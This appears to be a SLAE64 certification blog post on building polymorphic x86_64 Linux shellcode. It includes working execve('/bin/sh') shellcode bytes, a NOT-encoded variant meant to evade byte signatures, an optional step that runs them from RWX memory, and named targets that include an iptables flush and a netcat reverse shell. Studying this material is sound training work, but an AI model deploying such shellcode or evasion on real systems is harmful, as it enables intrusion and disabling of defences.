
Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE64-1434

Target Operating System: 64 bit Linux (x86_64 GNU/Linux)


Assignment 6:

Take up any 3 shellcodes, 64 bit Linux ones, from Shell-Storm and create polymorphic versions which do not exceed 150% of the size of the original shellcode. Bonus points if you make the polymorphic version really obscure or maybe even shorter in length than the original one.
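The two hard constraints in that assignment (no more than 150% of the original's size, and bytes that no longer look like the original) are easy to get wrong by eyeballing a hexdump, so here is a small C harness that checks them. This is an added example written for this page; it is not code from the original post or from the linked shell-storm entries. Both byte strings are constructed for the example: the 23-byte execve("/bin//sh") stub is the common x86_64 one rather than any of the three shellcodes above, and the 27-byte variant rewrites it with a NOT-encoded string immediate, 32-bit zeroing, and `mov rdi, rsp` in place of `push rsp; pop rdi`. The `RUN_SHELLCODE` macro is a name chosen here; it is not defined by default, so the program only inspects the bytes and never executes them.

```c
/* Added example: check a polymorphic shellcode variant against the
 * assignment's constraints (no NUL bytes, <= 150% of the original size,
 * reduced shared byte pattern) without executing it. Not from the original
 * post or from shell-storm; both byte strings are constructed here. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef RUN_SHELLCODE   /* hypothetical build flag, off by default */
#include <sys/mman.h>
#endif

/* Constructed: the common 23-byte x86_64 execve("/bin//sh") stub.
 * xor rsi,rsi; push rsi; mov rdi,"/bin//sh"; push rdi; push rsp; pop rdi;
 * push 0x3b; pop rax; cdq; syscall */
static const unsigned char orig_sc[] =
    "\x48\x31\xf6\x56"
    "\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
    "\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
#define ORIG_LEN (sizeof(orig_sc) - 1)

/* Constructed polymorphic rewrite (27 bytes): the string immediate is stored
 * bitwise-NOT encoded and decoded at run time by `not rdi`.
 * xor esi,esi; push rsi; mov rdi,~"/bin//sh"; not rdi; push rdi;
 * mov rdi,rsp; push 0x3b; pop rax; xor edx,edx; syscall */
static const unsigned char poly_sc[] =
    "\x31\xf6\x56"
    "\x48\xbf\xd0\x9d\x96\x91\xd0\xd0\x8c\x97"
    "\x48\xf7\xd7\x57"
    "\x48\x89\xe7\x6a\x3b\x58\x31\xd2\x0f\x05";
#define POLY_LEN (sizeof(poly_sc) - 1)

/* Offset of the imm64 inside each `mov rdi, imm64` (after the 48 bf bytes). */
#define ORIG_IMM_OFF 6
#define POLY_IMM_OFF 5

/* A NUL byte would truncate the payload in a strcpy-style injection. */
size_t count_nulls(const unsigned char *sc, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += (sc[i] == 0);
    return n;
}

/* Assignment rule: poly <= 1.5 * orig, checked in integers (2*poly <= 3*orig). */
int within_size_limit(size_t orig_len, size_t poly_len) {
    return 2 * poly_len <= 3 * orig_len;
}

/* Read an 8-byte little-endian immediate, independent of host endianness. */
uint64_t read_le64(const unsigned char *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Undo the NOT encoding exactly as the `not rdi` in the variant does. */
uint64_t decode_not_imm(const unsigned char *sc, size_t off) {
    return ~read_le64(sc + off);
}

/* 1 if the decoded immediate, laid out in memory as `push rdi` would leave it,
 * equals the expected 8-character path. */
int decoded_matches(const unsigned char *sc, size_t off, const char *expect) {
    uint64_t imm = decode_not_imm(sc, off);
    char s[9];
    for (int i = 0; i < 8; i++) s[i] = (char)((imm >> (8 * i)) & 0xff);
    s[8] = '\0';
    return strcmp(s, expect) == 0;
}

/* Longest run of identical consecutive bytes present in both blobs: a crude
 * measure of how much of the original's byte signature survives. */
size_t longest_shared_run(const unsigned char *a, size_t alen,
                          const unsigned char *b, size_t blen) {
    size_t best = 0;
    for (size_t i = 0; i < alen; i++)
        for (size_t j = 0; j < blen; j++) {
            size_t k = 0;
            while (i + k < alen && j + k < blen && a[i + k] == b[j + k]) k++;
            if (k > best) best = k;
        }
    return best;
}

int main(void) {
    printf("original: %zu bytes, %zu nulls\n", ORIG_LEN, count_nulls(orig_sc, ORIG_LEN));
    printf("variant : %zu bytes, %zu nulls\n", POLY_LEN, count_nulls(poly_sc, POLY_LEN));
    printf("within 150%%: %s\n", within_size_limit(ORIG_LEN, POLY_LEN) ? "yes" : "no");
    printf("longest shared byte run: %zu\n", longest_shared_run(orig_sc, ORIG_LEN, poly_sc, POLY_LEN));
    printf("variant decodes to /bin//sh: %s\n",
           decoded_matches(poly_sc, POLY_IMM_OFF, "/bin//sh") ? "yes" : "no");
#ifdef RUN_SHELLCODE
    /* Only with -DRUN_SHELLCODE: copy into RWX memory and jump to it. This
     * replaces the process with /bin/sh, which is why it is off by default. */
    void *m = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (m == MAP_FAILED) return 1;
    memcpy(m, poly_sc, POLY_LEN);
    ((void (*)(void))m)();
#endif
    return 0;
}
```

The shared-run number is the one to watch when aiming for the "really obscure" bonus: the five-byte run that survives here (`31 f6 56 48 bf`, the zeroing plus the `mov rdi` opcode) is exactly the kind of fragment a byte signature would still key on, so a further round of substitution would target that prefix.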


Background reading on polymorphic shellcode detection (the Nemu network-level emulation papers):
https://www.fp6-noah.org/publications/papers/nemu_raid07.pdf
https://www3.cs.stonybrook.edu/~mikepo/papers/nemu.virology.pdf


I have decided that, since these blog posts tend to get rather long, I will create a separate blog post for each of the 3 shellcodes that I chose from Shell-Storm and simply put a link to those blog posts here.



The First Shellcode


setuid(0) + execve(/bin/sh)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-77.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html



The Second Shellcode


execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-683.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html


The Third Shellcode


execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-823.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html

